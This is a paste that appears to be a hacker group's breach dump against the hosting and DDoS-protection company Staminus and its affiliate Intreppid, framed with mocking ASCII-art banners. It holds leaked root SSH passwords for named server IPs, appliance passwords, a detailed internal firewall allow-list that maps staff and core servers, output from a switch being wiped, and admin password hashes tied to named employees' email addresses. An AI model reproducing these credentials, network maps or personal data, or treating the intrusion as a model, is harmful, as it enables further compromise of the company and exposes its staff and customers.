Advertisement
Guest User

Untitled

a guest
Nov 23rd, 2017
251
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 83.40 KB | None | 0 0
  1. /$$$$$$$$ /$$ /$$ /$$$$$$ /$$ /$$ /$$ /$$$$$$$$ /$$ /$$ /$$$$$$ /$$ /$$
  2. | $$_____/| $$ | $$ /$$__ $$| $$ /$$/ | $/| $$_____/| $$$ /$$$ /$$__ $$| $$ | $$
  3. | $$ | $$ | $$| $$ \__/| $$ /$$/ |_/ | $$ | $$$$ /$$$$ | $$ \ $$| $$ | $$
  4. | $$$$$ | $$ | $$| $$ | $$$$$/ | $$$$$ | $$ $$/$$ $$ | $$$$$$$$| $$ | $$
  5. | $$__/ | $$ | $$| $$ | $$ $$ | $$__/ | $$ $$$| $$ | $$__ $$| $$ | $$
  6. | $$ | $$ | $$| $$ $$| $$\ $$ | $$ | $$\ $ | $$ | $$ | $$| $$ | $$
  7. | $$ | $$$$$$/| $$$$$$/| $$ \ $$ | $$$$$$$$| $$ \/ | $$ | $$ | $$| $$$$$$$$| $$$$$$$$
  8. |__/ \______/ \______/ |__/ \__/ |________/|__/ |__/ |__/ |__/|________/|________/
  9.  
  10. ~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~FTA~
  11.  
  12. ~[CTRL-C]~ PREFACE
  13.  
  14. "fuck":(third-person singular simple present fucks, present participle fucking, simple past and past participle fucked)
  15.  
  16. - (vulgar, colloquial, often obscene) To have sexual intercourse, to copulate
  17. "Fighting for peace is like fucking for virginity."
  18.  
  19. - (vulgar, colloquial) To put in an extremely difficult or impossible situation.
  20. "I'm afraid they're gonna fuck you on this one."
  21.  
  22. ███████╗████████╗ █████╗ ███╗ ███╗██╗███╗ ██╗██╗ ██╗███████╗
  23. ██╔════╝╚══██╔══╝██╔══██╗████╗ ████║██║████╗ ██║██║ ██║██╔════╝
  24. ███████╗ ██║ ███████║██╔████╔██║██║██╔██╗ ██║██║ ██║███████╗
  25. ╚════██║ ██║ ██╔══██║██║╚██╔╝██║██║██║╚██╗██║██║ ██║╚════██║
  26. ███████║ ██║ ██║ ██║██║ ╚═╝ ██║██║██║ ╚████║╚██████╔╝███████║
  27. ╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚══════╝
  28. "Bring it on baby"
  29.  
  30. ~[CTRL-D]~ STAMINUS
  31.  
  32. TIPS WHEN RUNNING A SECURITY COMPANY:
  33. ~ Use one root password for all the boxes
  34. ~ Expose PDU's to WAN with telnet auth
  35. ~ Never patch, upgrade or audit the stack
  36. ~ Disregard PDO as inconvenient
  37. ~ Hedge entire business on security theatre
  38. ~ Store full credit card info in plaintext
  39. ~ Write all code with wreckless abandon
  40.  
  41. Database: staminus2
  42. [185 tables]
  43. +------------------------------+
  44. | GOBIG_capture |
  45. | GOBIG_global_defaults |
  46. | GOBIG_group |
  47. | GOBIG_ip |
  48. | GOBIG_ip_account |
  49. | GOBIG_landing |
  50. | GOBIG_marketing |
  51. | GOBIG_vpn |
  52. | GOBIG_wifi_router |
  53. | GOBIG_wifi_router_account |
  54. | GOBIG_wifi_router_inventory |
  55. | ZONE_backend |
  56. | ZONE_domain |
  57. | ZONE_feature |
  58. | ZONE_feature_main |
  59. | ZONE_feature_package |
  60. | ZONE_feature_site |
  61. | ZONE_frontend |
  62. | ZONE_ip |
  63. | ZONE_main |
  64. | ZONE_ns |
  65. | ZONE_package |
  66. | ZONE_queue |
  67. | ZONE_site |
  68. | ZONE_sp |
  69. | session |
  70. | user |
  71. | abuse_stats |
  72. | account |
  73. | account_information |
  74. | account_server |
  75. | acknowledgeLog |
  76. | actionLog |
  77. | active_db |
  78. | addon |
  79. | api |
  80. | appliance |
  81. | appliance_action_log |
  82. | appliance_group |
  83. | appliance_group_actions |
  84. | appliance_group_names |
  85. | appliance_lan |
  86. | appliance_log |
  87. | bgp_advertise_log |
  88. | bgp_info |
  89. | bgp_tunnel_info |
  90. | billing |
  91. | billing_array |
  92. | billing_detail |
  93. | billing_onapp |
  94. | billing_server |
  95. | bundle_ip |
  96. | bw_track |
  97. | bw_usage |
  98. | cancel_reason |
  99. | ccbilling |
  100. | clean_graph_map |
  101. | cloud_ip_map |
  102. | config |
  103. | contract_info |
  104. | coupon |
  105. | credit_card |
  106. | ddos_historical_data |
  107. | ddos_report |
  108. | ddos_report_details |
  109. | denied_order |
  110. | dynamic_protected |
  111. | email_queue |
  112. | email_subscription |
  113. | email_template |
  114. | flowNullConfig |
  115. | flowStats |
  116. | geoip_country_blocks |
  117. | geoip_country_locations |
  118. | geoip_country_whois |
  119. | gig_hour_usage_history |
  120. | gighour_usage |
  121. | huawei_cleaning |
  122. | huawei_requests |
  123. | huawei_requests_log |
  124. | ip_limit |
  125. | ip_limit_history |
  126. | ip_limit_profile |
  127. | ip_limit_profiles |
  128. | ipmi_ip |
  129. | lan_subnet |
  130. | loginLog |
  131. | max_mind_results |
  132. | motd |
  133. | msg_communication |
  134. | nextip |
  135. | nullroute_report |
  136. | nullroutes |
  137. | number_of_ips |
  138. | oauth_access_tokens |
  139. | oauth_authorization_codes |
  140. | oauth_clients |
  141. | oauth_jwt |
  142. | oauth_refresh_tokens |
  143. | oauth_scopes |
  144. | oauth_users |
  145. | page_hiding |
  146. | page_hiding_pages |
  147. | promotion |
  148. | promotion_landing |
  149. | promotion_stock |
  150. | protect_log |
  151. | queue |
  152. | rating_banlist |
  153. | rating_details |
  154. | rating_settings |
  155. | rating_summary |
  156. | raw_log |
  157. | restore_lansubnet |
  158. | restore_serverip |
  159. | router_monitor |
  160. | run_rate_historical_data |
  161. | scloud |
  162. | scloud_backend |
  163. | scloud_backend_options |
  164. | scloud_backend_variables |
  165. | scloud_frontend |
  166. | scloud_frontend_options |
  167. | secureport |
  168. | secureport20150629 |
  169. | secureport_active_baseline |
  170. | secureport_entry |
  171. | secureport_gighour |
  172. | secureport_profile |
  173. | secureport_profiles |
  174. | secureport_restore1 |
  175. | secureport_restore2 |
  176. | secureport_states |
  177. | secureport_states_exempt |
  178. | secureport_states_syn |
  179. | secureport_static_whitelist |
  180. | secureport_whitelist |
  181. | secureportfoo |
  182. | server |
  183. | server_addon |
  184. | server_ddos_report |
  185. | server_firewall |
  186. | server_ip |
  187. | server_ip6 |
  188. | server_map |
  189. | server_monitor |
  190. | server_price_historical_data |
  191. | service_request |
  192. | shipping_log |
  193. | short_term_block_log |
  194. | signup |
  195. | slow_egress |
  196. | staff |
  197. | staff_block |
  198. | staff_push |
  199. | staff_queue |
  200. | static_bypass |
  201. | static_protected |
  202. | stock |
  203. | stock_compatible_addon |
  204. | swip |
  205. | ticket |
  206. | ticket_message |
  207. | ticket_queue |
  208. | ticket_server |
  209. | ticket_staff_message |
  210. | ticket_statistics_data |
  211. | traffic_block |
  212. | traffic_live |
  213. | traffic_live_global |
  214. | traffic_live_server |
  215. | traffic_report |
  216. | traffic_report_entry |
  217. | tunnel_info |
  218. | udp_block |
  219. | whitelist_ip |
  220. | work_order |
  221. | work_order_addon |
  222. | work_order_available_options |
  223. | work_order_message |
  224. | work_order_option |
  225. | work_order_server |
  226. | work_order_staff |
  227. | work_order_ticket |
  228. | work_order_type |
  229. +------------------------------+
  230.  
  231. mysql> mysql> select * from appliance;
  232. +----+----------+-------------------+------------+---------+----------------+-----------------+----------------+-------------+-------------+
  233. | ID | serverID | name | hostname | groupID | ip | netmask | gateway | peerIP | md5password |
  234. +----+----------+-------------------+------------+---------+----------------+-----------------+----------------+-------------+-------------+
  235. | 11 | 200014 | Leonardo | sec01-via1 | 9 | 216.46.165.2 | 255.255.255.252 | 216.46.165.1 | 74.63.128.9 | qYaENLr3 |
  236. | 13 | 200015 | sec02-via1 | sec02-via1 | 9 | 216.24.132.254 | 255.255.255.252 | 216.24.132.253 | 74.63.128.9 | qYaENLr3 |
  237. | 15 | 200016 | sec03-via1 | sec03-via1 | 9 | 206.71.66.2 | 255.255.255.252 | 206.71.66.1 | 74.63.128.9 | qYaENLr3 |
  238. | 17 | 200017 | sec04-via1 | sec04-via1 | 9 | 216.46.191.202 | 255.255.255.252 | 216.46.191.201 | 74.63.128.9 | qYaENLr3 |
  239. | 19 | 200001 | 87751-MON01.SLC04 | NULL | 9 | 204.246.136.86 | 255.255.255.252 | 204.246.136.85 | NULL | NULL |
  240. | 21 | 200002 | 87751-MON01.DAL01 | NULL | 9 | 66.205.176.154 | 255.255.255.252 | 66.205.176.153 | NULL | NULL |
  241. | 23 | 200003 | 87751-MON01.LAS04 | NULL | 9 | 209.170.203.74 | 255.255.255.252 | 209.170.203.73 | NULL | NULL |
  242. | 25 | 200004 | 87751-MON01.MSP01 | NULL | 9 | 209.236.97.130 | 255.255.255.252 | 209.236.97.129 | NULL | NULL |
  243. | 27 | 200005 | 87751-MON01.PHX01 | NULL | 9 | 76.9.185.162 | 255.255.255.252 | 76.9.185.161 | NULL | NULL |
  244. | 29 | 200006 | 87751-MON01.PDX01 | NULL | 9 | 207.189.98.18 | 255.255.255.252 | 207.189.98.17 | NULL | NULL |
  245. | 31 | 200007 | 87751-MON01.SLC07 | NULL | 9 | 66.133.96.2 | 255.255.255.252 | 66.133.96.1 | NULL | NULL |
  246. | 32 | 200020 | MON01-NAC | sec01-nac1 | 14 | 207.99.107.6 | 255.255.255.252 | 207.99.107.5 | NULL | NULL |
  247. | 38 | 200021 | MON02-NAC | sec02-nac1 | 14 | 207.99.112.174 | 255.255.255.252 | 207.99.112.173 | NULL | NULL |
  248. | 44 | 200022 | MON03-NAC | sec03-nac1 | 14 | 207.99.113.102 | 255.255.255.252 | 207.99.113.101 | NULL | NULL |
  249. +----+----------+-------------------+------------+---------+----------------+-----------------+----------------+-------------+-------------+
  250. 14 rows in set (0.00 sec)
  251.  
  252. mysql> describe credit_card;
  253. +-----------+------------------+------+-----+---------+----------------+
  254. | Field | Type | Null | Key | Default | Extra |
  255. +-----------+------------------+------+-----+---------+----------------+
  256. | ID | int(10) unsigned | NO | PRI | NULL | auto_increment |
  257. | accountID | varchar(100) | NO | MUL | NULL | |
  258. | firstName | varchar(30) | YES | | NULL | |
  259. | lastName | varchar(30) | YES | | NULL | |
  260. | number | varchar(17) | NO | | NULL | |
  261. | expMonth | int(2) | NO | | NULL | |
  262. | expYear | int(4) | NO | | NULL | |
  263. | validated | int(1) | YES | | 0 | |
  264. | main | int(1) | YES | | 0 | |
  265. | cvv | varchar(10) | YES | | NULL | |
  266. +-----------+------------------+------+-----+---------+----------------+
  267. 10 rows in set (0.00 sec)
  268.  
  269. :: SAMPLE ::
  270.  
  271. ["SPCHECK" spcheck ssh:104.131.132.49 ]:root:St4m|nu5
  272. ["VM HOST" cl08-irv1 ssh:72.8.154.8 ]:root:St4m|nu5
  273. ["MOTHERLOAD" apitest ssh:69.197.35.134 ]:root:St4m|nu5
  274. ["CHATBOT" chatbot ssh:69.197.35.133 ]:root:St4m|nu5
  275. ["backup01-s3073-cab38-ocloud-irv1" ssh:69.197.40.229]:root:St4m|nu5
  276. ["ams2" ssh:176.56.238.205 ]:root:St4m|nu5
  277. ["proxweb" ssh:72.8.128.4]:root:St4m|nu5
  278. ["smb01-irv1" ssh:72.8.128.34]:root:St4m|nu5
  279. ["kkk" ssh:69.197.31.193]:root:TkBNk7TdrSh2Uq42
  280. ["puppet-agent" ssh:199.192.78.210]:root:St4m|nu5
  281.  
  282. :: SAMPLE ::
  283.  
  284. Formatting bootflash: ...
  285. Format of bootflash complete
  286. Erasing nvram:
  287. Erasing cat4000_flash:
  288. Clearing crashinfo:data
  289. Clearing the last power failure timestamp
  290. Clearing all ROMMON variables
  291. Setting default ROMMON variables:
  292. ConfigReg=0x2101
  293. PS1=rommon ! >
  294. EnableAutoConfig=1
  295. Setting vtp mode to transparent
  296. %WARNING! Please reboot the system for the changes to take effect
  297. aggr2.irv1#reset
  298.  
  299. OURNETS="72.20.0.0/18 69.197.0.0/18 72.8.128.0/18 199.192.72.0/21"
  300. RFC1918="10.0.0.0/8 192.168.0.0/16"
  301. LOCAL="127.0.0.0/8"
  302.  
  303. ## External (people or resources)
  304. JOHN_ALLOW="216.114.66.22 65.110.55.179 63.246.134.202 69.26.161.38 72.20.10.253 162.230.6.44 162.230.6.45"
  305. HASSAN_ALLOW="72.8.154.80 41.130.32.164 72.8.154.79"
  306. EUGENE_ALLOW="66.228.39.208 199.192.76.90"
  307. ONAPP_ALLOW="83.170.70.4 69.72.249.232"
  308. CYBERSOURCE_ALLOW="66.185.176.0/20"
  309. JEFF_ALLOW="209.44.125.0/28 205.204.94.18 69.197.35.154 69.197.38.80/28"
  310. MATT_ALLOW="70.169.227.248 99.46.104.171"
  311. ARAD_ALLOW="174.67.216.146"
  312. ERIC_HO_ALLOW="76.216.235.9 70.181.119.63 68.15.73.170 68.170.67.222"
  313. EXTERNAL_VPN_ALLOW="72.8.128.35"
  314.  
  315.  
  316. ## Set our main allow variable
  317. ALLOW=""
  318.  
  319. ## Global allows
  320. ALLOW_MAIN=""
  321. ALLOW_MAIN="$ALLOW_MAIN $RFC1918 $LOCAL"
  322. ALLOW_MAIN="$ALLOW_MAIN 72.20.1.2 72.20.0.0/24 69.197.1.0/24" # Internal
  323. ALLOW_MAIN="$ALLOW_MAIN 199.241.199.0/24"; # IB AMS1
  324. ALLOW_MAIN="$ALLOW_MAIN 199.241.198.0/24"; # IB NYC1
  325. ALLOW_MAIN="$ALLOW_MAIN 162.220.32.62"; # IB NYC1 ATRATO
  326. ALLOW_MAIN="$ALLOW_MAIN 199.241.197.0/24"; # IB LAX1
  327. ALLOW_MAIN="$ALLOW_MAIN 199.241.196.0/24"; # IB LAX2
  328. ALLOW_MAIN="$ALLOW_MAIN 69.197.3.204 69.197.3.205 69.197.3.206" # IB IRV1
  329. ALLOW="$ALLOW $ALLOW_MAIN"
  330.  
  331. ## OOB
  332. ALLOW_OOB=""
  333. ALLOW_OOB="$ALLOW_OOB 98.189.83.123"; # OOB Irvine
  334. ALLOW_OOB="$ALLOW_OOB 207.166.140.0/29"; # OOB Coresite
  335. ALLOW_OOB="$ALLOW_OOB 198.24.32.82"; # OOB NYC1
  336. ALLOW_OOB="$ALLOW_OOB 213.52.181.178"; # OOB AMS1
  337. ALLOW_OOB="$ALLOW_OOB 66.128.156.60"; # OOB LAX2
  338. ALLOW="$ALLOW $ALLOW_OOB"
  339.  
  340. ## Comm
  341. ALLOW_COMM=""
  342. ALLOW_COMM="$ALLOW_COMM $MATT_ALLOW $ARAD_ALLOW $EUGENE_ALLOW"
  343. ALLOW_COMM="$ALLOW_COMM 4.2.2.1 8.8.8.8" # DNS
  344. ALLOW_COMM="$ALLOW_COMM 18.7.21.144 66.241.101.63" # TIME
  345. ALLOW_COMM="$ALLOW_COMM 69.197.63.142" # IRV1 LAN
  346. ALLOW_COMM="$ALLOW_COMM 72.20.22.29" # LAX1 WIFI
  347. ALLOW_COMM="$ALLOW_COMM 72.20.55.32/29" # VPN
  348. ALLOW="$ALLOW $ALLOW_COMM"
  349.  
  350. ## Routers / Bridges / SP
  351. ALLOW_ROUTER=""
  352. ALLOW_ROUTER="$ALLOW_ROUTER 224.0.0.0/8" # Multicast / OSPF
  353. ALLOW="$ALLOW $ALLOW_ROUTER"
  354.  
  355. ## Core servers
  356.  
  357.  
  358. ## SNMP Pulling to a specific server also goes here
  359. ALLOW_CORE=""
  360. ALLOW_CORE="$ALLOW_CORE 72.8.154.76" # staffwiki
  361. ALLOW_CORE="$ALLOW_CORE 72.8.154.85" # captive-portal
  362. ALLOW_CORE="$ALLOW_CORE 72.8.157.186" # intrepid multicraft
  363. ALLOW_CORE="$ALLOW_CORE 72.8.154.76" # staffwiki
  364. ALLOW_CORE="$ALLOW_CORE 72.8.154.91" # web02-irv1
  365. ALLOW_CORE="$ALLOW_CORE 72.20.10.78" # web03-irv1
  366. ALLOW_CORE="$ALLOW_CORE 72.8.156.176" # web03-lax1
  367. ALLOW_CORE="$ALLOW_CORE 72.8.128.34" # smb01-irv1
  368. ALLOW_CORE="$ALLOW_CORE 69.197.32.75" # intreppid web
  369. ALLOW_CORE="$ALLOW_CORE 72.8.183.206" # web01-int-irv1.intreppid
  370. ALLOW_CORE="$ALLOW_CORE 69.197.35.55" # public wiki
  371. ALLOW_CORE="$ALLOW_CORE 72.8.154.71" # dev01-irv1
  372. ALLOW_CORE="$ALLOW_CORE 72.8.154.89" # dev02-irv1
  373. ALLOW_CORE="$ALLOW_CORE 72.8.154.66" # sql01-irv1
  374. ALLOW_CORE="$ALLOW_CORE 72.8.156.175" # sql02-irv1
  375. ALLOW_CORE="$ALLOW_CORE 72.8.154.69" # mx01-irv1
  376. ALLOW_CORE="$ALLOW_CORE 72.20.26.125" # Staminus Webserver vhosts
  377. ALLOW_CORE="$ALLOW_CORE 69.197.58.67" # www.staminus.net
  378. ALLOW_CORE="$ALLOW_CORE 72.20.5.98" # captcha01-irv1
  379. ALLOW_CORE="$ALLOW_CORE 199.241.197.97" # bbgre01-lax1
  380. ALLOW_CORE="$ALLOW_CORE 199.241.198.15" # bbgre01-nyc1
  381. ALLOW_CORE="$ALLOW_CORE 199.241.199.15" # bbgre01-ams1
  382. ALLOW_CORE="$ALLOW_CORE 72.8.156.130" # gre01-lax1
  383. ALLOW_CORE="$ALLOW_CORE 72.8.156.174" # gre02-lax1
  384. ALLOW_CORE="$ALLOW_CORE 72.8.156.131" # cache01-lax1
  385. ALLOW_CORE="$ALLOW_CORE 72.8.156.162" # jmp01-lax1
  386. ALLOW_CORE="$ALLOW_CORE 72.20.9.2" # jmp01-lax2
  387. ALLOW_CORE="$ALLOW_CORE 72.8.154.75" # jmp01-irv1
  388. ALLOW_CORE="$ALLOW_CORE 72.8.154.72" # ldap01-irv1
  389. ALLOW_CORE="$ALLOW_CORE 69.197.63.150" # manage01-irv1
  390. ALLOW_CORE="$ALLOW_CORE 66.241.102.86" # monitor-vitelity
  391. ALLOW_CORE="$ALLOW_CORE 66.241.100.79" # cacti-vitelity
  392. ALLOW_CORE="$ALLOW_CORE 72.8.154.95/32 72.20.53.2" # cacti-irv1
  393. ALLOW_CORE="$ALLOW_CORE 199.241.198.141" # cacti01-nyc1
  394. ALLOW_CORE="$ALLOW_CORE 199.241.199.146" # cacti01-nyc1
  395. ALLOW_CORE="$ALLOW_CORE 66.241.106.77" # pbx1-dnv1
  396. ALLOW_CORE="$ALLOW_CORE 72.20.40.1 72.20.40.102" # NFS
  397. ALLOW_CORE="$ALLOW_CORE 69.197.61.80/29" # LB 10G Subnet
  398. ALLOW_CORE="$ALLOW_CORE 72.8.154.87" # nagios-irv1
  399. ALLOW_CORE="$ALLOW_CORE 72.8.154.95" # cacti-irv1
  400. ALLOW_CORE="$ALLOW_CORE 72.8.156.152"; # backup01-lax1
  401. ALLOW_CORE="$ALLOW_CORE 69.197.35.178"; # infrasvn01-irv1
  402. ALLOW_CORE="$ALLOW_CORE 69.197.35.249"; # push01-irv1
  403. ALLOW_CORE="$ALLOW_CORE 69.197.35.158"; # push02-irv1
  404. ALLOW_CORE="$ALLOW_CORE 69.197.35.150"; # nfs02-irv1
  405. ALLOW_CORE="$ALLOW_CORE 69.197.2.34"; # sniff-cab26-irv1
  406. ALLOW_CORE="$ALLOW_CORE 69.197.63.150"; # sniff-cab0-irv1
  407. #ALLOW_CORE="$ALLOW_CORE 72.8.128.6"; # pxc01-irv1
  408. #ALLOW_CORE="$ALLOW_CORE 72.8.128.7"; # pxc02-irv1
  409. #ALLOW_CORE="$ALLOW_CORE 72.8.152.20"; # pxc01-lax1
  410. ALLOW="$ALLOW $ALLOW_CORE"
  411.  
  412.  
  413. ## Useful because these are our common servers that we want allowed everywhere
  414. ALLOW_BASE1="$ALLOW_MAIN $ALLOW_OOB $ALLOW_COMM $ALLOW_CORE"
  415.  
  416. ## Infrastucture SVN does not need to allow any access to it other than below
  417. ALLOW_BASE2="$ALLOW_MAIN $ALLOW_OOB $ALLOW_COMM"
  418.  
  419. ## Other Servers
  420. ALLOW_SRV=""
  421. ALLOW_SRV="$ALLOW_SRV 72.8.154.74 72.20.27.29" # IRV1 SURV1
  422. ALLOW="$ALLOW $ALLOW_SRV"
  423.  
  424. ## Physical Infrastructure
  425. ALLOW_INFRA=""
  426. ALLOW_INFRA="$ALLOW_INFRA 72.8.189.128/25" # IRV1 APC PDUs
  427. ALLOW_INFRA="$ALLOW_INFRA 72.8.144.0/25" # IRV1 APC PDUs
  428. ALLOW_INFRA="$ALLOW_INFRA 72.20.39.208/28" # APC 1W SUITE 805 AA03/AA04/AA05
  429. ALLOW="$ALLOW $ALLOW_INFRA"
  430.  
  431. ## Management
  432. ALLOW_MANAGE=""
  433. ALLOW_MANAGE="$ALLOW_MANAGE 72.8.158.128/26 69.197.23.32/28" # IRV1 RAR
  434. ALLOW_MANAGE="$ALLOW_MANAGE 72.8.143.0/25" # IRV1 RAR
  435. ALLOW_MANAGE="$ALLOW_MANAGE 72.20.54.58" # rar1.irv1
  436. ALLOW_MANAGE="$ALLOW_MANAGE 72.20.54.62" # rar2.irv1
  437. ALLOW_MANAGE="$ALLOW_MANAGE 72.20.38.174" # IPKVM
  438. ALLOW_MANAGE="$ALLOW_MANAGE 72.20.39.174" # Spider IPKVM
  439. # lax1 and lax2 raritans defined in other subnets
  440. ALLOW="$ALLOW $ALLOW_MANAGE"
  441.  
  442. ## No idea what this is. One of these subnets is now customer allocated. I can't find them reserved in ip.class.
  443. #ALLOW="$ALLOW 72.8.131.224/29" # LAX2 C1 MANAGEMENT
  444. #ALLOW="$ALLOW 72.20.51.0/28" # LAX2 C2 MANAGEMENT
  445. #ALLOW="$ALLOW 72.20.41.208/28" # LAX2 C3 MANAGEMENT
  446. #ALLOW="$ALLOW 72.20.52.128/28" # LAX2 C4 MANAGEMENT
  447. #ALLOW="$ALLOW 72.20.36.112/28" # LAX2 C5 MANAGEMENT
  448.  
  449.  
  450.  
  451. ## Intreppid
  452. ALLOW_INTREP="$ALLOW_INTREP 72.8.183.234" # cust1-irv1.intreppid.com
  453. ALLOW_INTREP="$ALLOW_INTREP 72.8.183.206" # server1.intreppid.com, web01-int-irv1.intreppid.com
  454. ALLOW_INTREP="$ALLOW_INTREP 72.8.157.186" # cust2-irv1.intreppid.com
  455. ALLOW_INTREP="$ALLOW_INTREP 72.8.157.90" # source1-irv1.intreppid.com
  456. ALLOW_INTREP="$ALLOW_INTREP 72.20.30.102" # cust3-irv1.intreppid.com
  457. ALLOW_INTREP="$ALLOW_INTREP 162.220.32.2" # cust1-nyc1.intreppid.com
  458.  
  459. ALLOW="$ALLOW $ALLOW_INTREP"
  460.  
  461. ## VM: Internal Xen Pool
  462. ALLOW_VM_XEN_INT=""
  463. ALLOW_VM_XEN_INT="$ALLOW_VM_XEN_INT 72.8.153.0/24" # Xen Storage - irv1
  464. ALLOW_VM_XEN_INT="$ALLOW_VM_XEN_INT 72.8.154.0/24" # Xen cloud-irv1
  465. ALLOW_VM_XEN_INT="$ALLOW_VM_XEN_INT 72.8.152.0/27" # Xen Cloud - lax1 (aa05)
  466. ALLOW_VM_XEN_INT="$ALLOW_VM_XEN_INT 72.8.152.32/27" # Xen Storage - lax1 (aa05)
  467. ALLOW_VM_XEN_INT="$ALLOW_VM_XEN_INT 72.8.159.130" # Xen cloud06-lax1
  468. #ALLOW="$ALLOW $ALLOW_VM_XEN_INT"
  469.  
  470. ## VM: Customer Xen Pool
  471. ALLOW_VM_XEN_CUST=""
  472. ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.63.221" # stor0-cab26.irv1
  473. ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.2 69.197.2.6 69.197.2.10 69.197.2.14" # pool-cab26-irv1
  474. ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.18 69.197.2.22 69.197.2.26" # pool-cab26-irv1
  475. ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.30 69.197.2.34 69.197.2.38" # pool-cab26-irv1
  476. ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.42 69.197.2.46 69.197.2.50" # pool-cab26-irv1
  477. ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.54 69.197.2.58 69.197.2.62" # pool-cab26-irv1
  478. ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.66 69.197.2.70 69.197.2.74" # pool-cab26-irv1
  479. ALLOW_VM_XEN_CUST="$ALLOW_VM_XEN_CUST 69.197.2.78" # pool-cab26-irv1
  480. #ALLOW="$ALLOW $ALLOW_VM_XEN_CUST"
  481.  
  482. ## VM: Customer Onapp
  483. ALLOW_VM_ONAPP_CUST=""
  484. ALLOW_VM_ONAPP_CUST="$ALLOW_VM_ONAPP_CUST 69.197.40.224/27" # Onapp Cloud (CP+HV)
  485. ALLOW_VM_ONAPP_CUST="$ALLOW_VM_ONAPP_CUST 72.20.52.32/27" # Onapp Cloud Managem
  486. ALLOW_VM_ONAPP_CUST="$ALLOW_VM_ONAPP_CUST 72.20.56.160/27" # Onapp Cloud Storage
  487. ALLOW_VM_ONAPP_CUST="$ALLOW_VM_ONAPP_CUST 72.20.45.160/27 69.197.51.128/26" # Onapp Cloud Applian
  488. #ALLOW_VM_ONAPP_CUST="$ALLOW_VM_ONAPP_CUST 72.20.42.224/27" # Onapp Cloud Provisi
  489. #ALLOW="$ALLOW $ALLOW_VM_ONAPP_CUST"
  490.  
  491.  
  492. ██╗███╗ ██╗████████╗██████╗ ███████╗██████╗ ██████╗ ██╗██████╗
  493. ██║████╗ ██║╚══██╔══╝██╔══██╗██╔════╝██╔══██╗██╔══██╗██║██╔══██╗
  494. ██║██╔██╗ ██║ ██║ ██████╔╝█████╗ ██████╔╝██████╔╝██║██║ ██║
  495. ██║██║╚██╗██║ ██║ ██╔══██╗██╔══╝ ██╔═══╝ ██╔═══╝ ██║██║ ██║
  496. ██║██║ ╚████║ ██║ ██║ ██║███████╗██║ ██║ ██║██████╔╝
  497. ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═════╝
  498.  
  499. ~[CTRL-G]~ INTREPPID
  500. mysql> select ID,user_login,user_pass,user_email,display_name from wp_users;
  501. +----+------------+------------------------------------+----------------------------+----------------+
  502. | ID | user_login | user_pass | user_email | display_name |
  503. +----+------------+------------------------------------+----------------------------+----------------+
  504. | 1 | Intrepid | $P$Bg3ea3fGT/TZY5xJusY4z8G8I8ILLu0 | arad@staminus.net | Intrepid |
  505. | 2 | JonathanF | $P$BgBYOIQCL5D3sO1Rb613vG7lz5mGwL1 | jonathan.fong@staminus.net | Jonathan Fong |
  506. | 4 | Intreppid | $P$B.sWV52K7I0MjPY6R1X.WGVYy3OYWp0 | matt@staminus.net | Intreppid |
  507. | 8 | Daddy | $P$BxdgzLlpb8COonSBxC7oTQAaie8jv9. | daddy.now@grr.la | Brandon Harris |
  508. | 5 | AradM | $P$B5Q/wWxoW30vJ7UcMwj0yTaeru85kQ/ | arad.mahdavi@staminus.net | Arad Mahdavi |
  509. | 6 | MattM | $P$BxdgzLlpb8COonSBxC7oTQAaie8jv9. | matt.mahvi@staminus.net | Matt Mahvi |
  510. | 7 | DaneT | $P$B9amTGmavXeU8HDTHjxdI05o39Brds/ | dane.tuso@staminus.net | Dane Tuso |
  511. +----+------------+------------------------------------+----------------------------+----------------+
  512. mysql> select email,password,passwordhash from tbladmins where disabled=0;
  513. +------------------------------+--------------------------------------------------------------+--------------------------------------------------------------+
  514. | email | password | passwordhash |
  515. +------------------------------+--------------------------------------------------------------+--------------------------------------------------------------+
  516. | carolyn.royer@staminus.net | $2y$10$fNwuVcURM4DV88lS9uH5LehQHn71DDw47LohXW63D0yXiMPzwO3Xe | $2y$10$fBm6QC/tVuJzn7bR.Bjq6uZQJYcryfvUJTwg..xifNrKvlG7fSN2O |
  517. | jeff.mahvi@staminus.net | $2y$10$YGdBvbUJJXMZyTog7pTaHOuQfNn2pIgcvrkALV6NEr22Nl/uBSQ1u | $2y$10$4WESz22yrG3FzeiRhwqCNOkmRb2Y85y.dvXQjJ8PuTi1IkL1fKCw. |
  518. | arad.mahdavi@staminus.net | $2y$10$8wQWTUsp7zXJcHqgiboIW.RWA.3D2wqm0lQ6Omg5B4ajkFJ.YGfMq | $2y$10$8mEhg5jeWOauma6TEzPdAuPYDHE1xpVQ9aDwMEqyvrIdUub8sMaCG |
  519. | matt.mahvi@staminus.net | $2y$10$ymI0xW7FbzEYkg4Lh4W75eP6l5GUZN1PLYtC6gBBg.zLAYQm1gNH6 | $2y$10$2Nf7qB3p9N14eUhaBa7xi.uX0OQoshKfk9L09evb96PodKP3ZP5uu |
  520. | setu.rajput@staminus.net | $2y$10$sKY2JvtlTkvXiBXu1EYbHev58oM1al9sKSF489hkbUhq.uQw4ft82 | $2y$10$xf8iEfdxE91fNrAoNncJ.ObL3uwwW9km/1Dq8HQ6p9FKuFn2mhAu. |
  521. | john.blazek@staminus.net | $2y$10$juWgDKEgZpjrzPhlHNERsuou5VxPWII1yAGolYd1jSdmeOee0NBzK | $2y$10$l6zTYZN.1IHTS8iUbsj23ukPeP0RxvrigLJFjmo604AyavsFbX.We |
